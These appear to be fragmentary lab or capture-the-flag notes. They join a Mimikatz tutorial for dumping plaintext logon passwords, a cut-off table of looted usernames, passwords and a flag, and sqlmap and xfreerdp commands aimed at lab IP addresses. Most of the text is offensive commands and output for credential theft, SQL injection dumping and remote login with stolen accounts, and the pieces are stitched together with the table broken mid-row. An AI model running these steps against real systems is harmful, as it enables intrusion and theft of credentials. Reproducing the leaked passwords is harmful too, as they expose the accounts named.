mimikatz
The process of extracting clear text passwords starts by invoking the debug command from the privilege module. This command elevates permissions for Mimikatz to get to the debug privilege level, and it looks like this:
mimikatz # privilege::debug
Privilege ‘20’ OK
To record a log of Mimikatz interactions and results, enter:
mimikatz # log
Using ‘mimikatz.log’ for logfile : OK
The default log file is mimikatz.log, but you can specify another log file name with a command. For example:
mimikatz # log customlogfilename.log
Once logging is turned on, the rest of the session will be recorded for exfiltration or analysis purposes.
Perhaps the simplest and most productive command is the one that extracts plaintext passwords, lists them on the console screen and writes them to the log file.
mimikatz # sekurlsa::logonpasswords
The logonpasswords command extracts a user ID and password for currently logged-in and recently logged-in users of the target system.
The sekurlsa module includes other commands to extract Kerberos credentials and encryption keys, and it can even perform a pass-the-hash attack using the credentials Mimikatz extracts.
| id | password | username |
+----+----------------------------------+----------------+
| 1 | WoWmAgE60 | b.mocarthy |
| 2 | 0912jgf93FSnjf | artica-ftp-acc |
| 3 | 3e46e7561ee64c719441df8da76bf715 | flag
sqlmap -u http://10.10.102.92/all_messages?to=1 --dbs , once I found the table just sqlmap -u http://10.10.102.92/all_messages?to=1 -D artica -T windows_directory --dump
rdp
xfreerdp /bpp:32 /gfx +aero +fonts /d:artica /u:fax_acc /v:10.10.102.105